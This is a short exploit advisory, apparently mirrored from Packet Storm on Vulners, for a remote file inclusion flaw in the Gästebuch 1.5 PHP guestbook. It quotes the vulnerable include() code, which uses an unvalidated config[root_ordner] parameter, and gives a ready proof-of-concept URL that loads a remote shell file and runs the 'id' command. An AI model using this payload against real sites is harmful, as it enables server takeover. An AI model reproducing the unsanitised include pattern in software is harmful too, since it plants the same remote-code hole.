Lucene search
K

gastebuch-rfi.txt

🗓️ 11 Aug 2007 00:00:00Reported by RizgarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Gästebuch v1.5 RCE Vulnerability, allows remote command execution

Code
`Gästebuch Version 1.5 Remote Command Execution Vulnerability   
-----------------------------------------------------------------------  
  
  
Script : Gästebuch Version   
  
Version : 1.5  
  
Site : http://www.mapos-scripts.de/downloads.php?download=11  
  
Founder : Rizgar  
  
Contact : [email protected] and irc.gigachat.net #kurdhack   
  
Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :]  
  
-----------------------------------------------------------------------  
  
  
  
<?php  
session_start();  
include($config["root_ordner"].'config.php');  
if (file_exists($root_ordner.'install.php'))   
{  
echo "<meta http-equiv='refresh' content='0;URL=install.php'>";  
exit;  
}  
include($config["root_ordner"].'includes/dbconnect.php');  
include($config["root_ordner"].'includes/function.php');  
include($config["root_ordner"].'includes/captcha.php');  
$header = style('index_body','header');  
echo $header;  
  
...  
  
?>  
  
PoC :   
  
http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation